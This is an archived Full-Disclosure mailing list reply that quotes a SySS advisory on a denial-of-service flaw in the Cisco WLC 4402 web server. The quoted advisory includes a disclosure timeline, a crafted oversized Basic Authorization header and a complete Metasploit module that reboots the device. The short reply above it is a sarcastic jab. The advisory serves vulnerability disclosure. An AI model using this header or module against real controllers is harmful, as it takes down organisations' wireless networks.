Re: Cisco WLC 4402 Denial-of-Service vulnerability

[antisecav () hushmail com]

that was a crappy disclosure. 

where is the .exe file with the gui?

at least make it in visual basic so i can have an interface

just send it to me in a zip


then itll be useful to the intelligence community


n3td3v / antisec

On Sun, 26 Jul 2009 09:17:52 -0500 SySS security advisories -- 
Christoph Bott <advisories () bott syss de> wrote:
> =======================================
> Vulnerable Product: Cisco WLC 4402 (most likely among many others)
> Vulnerability discovered: January 2009
> Reported to vendor: Jan 01, 2009
> Fix available: not yet
> =======================================
>
>
> TIMELINE:
> ---------------------------------------------------
> + 01/11/2009: discovered vulnerability on a customer's site
>
> + 01/13/2009: initial vendor contact via psirt () cisco com
>
> + 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631
>
> + 02/09/2009: vendor states, that bugfix is _not_ contained within
> cisco-sa-20090204-wlc
>
> + 03/30/2009: vendor states: "We have a fix  for this issue. 
> However,
> due to some other issues we are investigating we may not make this
> public until about 42 days."
>
> + 06/02/2009: vendor states: "I really apologize for the delay on
> publishing this advisory. The reason that we have not publish is 
> because
> we are also incorporating other security fixes within all the 
> affected
> releases. We WILL be publishing the advisory on July 8th, 2009 at 
> 1600 UTC."
>
> + 07/24/2009: Customer agreed with full disclosure
>
> + 07/26/2009: Still no fixes available; full disclosure due to 
> lacking
> vendor activities.
>
>
>
> PRODUCT:
> ---------------------------------------------------
> The Cisco WLC 4402 is a Wireless LAN Controller, which is 
> manageable via
> an integrated embedded webserver (emweb httpd).
>
>
>
> AFFECTED VERSIONS:
> ---------------------------------------------------
> The vulnerability described below could have been verified on WLC 
> 4402,
> software release 5.1.151.0. However, since the vulnerability 
> affects the
> integrated embedded emweb http daemon, several other products 
> and/or
> software releases might be affected, too.
>
>
>
> VULNERABILITY:
> ---------------------------------------------------
> Using long, random authentication data, the embedded web server 
> can be
> crashed, which leeds to a device reboot. Subsequently repeated 
> requests
> lead to a permanent denial of service of the WLC (and therefore of 
> the
> whole wireless infrastructure).
>
>
>
> EXPLOIT:
> ---------------------------------------------------
> Not needed.
>
> One only has to call
> "/screens/frameset.html"
> and provide Basic Authentication data which uses
> a username and password longer than 63 characters each.
>
> The following header worked for me:
> Authorization: Basic
> MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTA
> xMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NT
> Y3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0
>
>
> The following code snippet can be used as a module within the 
> metasploit
> framework:
>
> ---- snip -----
> require 'msf/core'
>
>
> class Metasploit3 < Msf::Auxiliary
>
>        include Msf::Exploit::Remote::Tcp
>        include Msf::Auxiliary::Dos
>
>        def initialize(info = {})
>                super(update_info(info,
>                        'Name'           => 'Cisco WLC 4200 Basic 
> Auth
> Denial of Service',
>                        'Description'    => %q{
>
>                                This module triggers a Denial of 
> Service
> condition in the Cisco WLC 4200
>                                HTTP server. By sending a GET 
> request
> with long authentication data, the
>                                device becomes unresponsive and 
> reboots.
> Firmware is reportedly vulnerable.
>                        },
>                        'Author'                => [ 'Christoph 
> Bott
> <msf[at]bott.syss.de>' ],
>                        'License'        => MSF_LICENSE,
>                        'Version'        => '$Revision: 5949 $',
>                        'References'     =>
>                                [
>                                        [ 'BID', '???'],
>                                        [ 'CVE', '???'],
>                                        [ 'URL',
> 'http://www.cisco.com/?????&apos;],
>                                ],
>                        'DisclosureDate' => 'January 26 2009'))
>
>                register_options(
>                        [
>                                Opt::RPORT(80),
>                        ], self.class)
>
>        end
>
>        def run
>                connect
>
>                print_status("Sending HTTP DoS packet")
>
>                sploit =
>                        "GET /screens/frameset.html HTTP/1.0\r\n" 
> +
>                        "Authorization: Basic
> MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTA
> xMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NT
> Y3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
>
>                sock.put(sploit + "\r\n")
>
>                disconnect
>        end
>
> end
>
> ---- snip ----
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/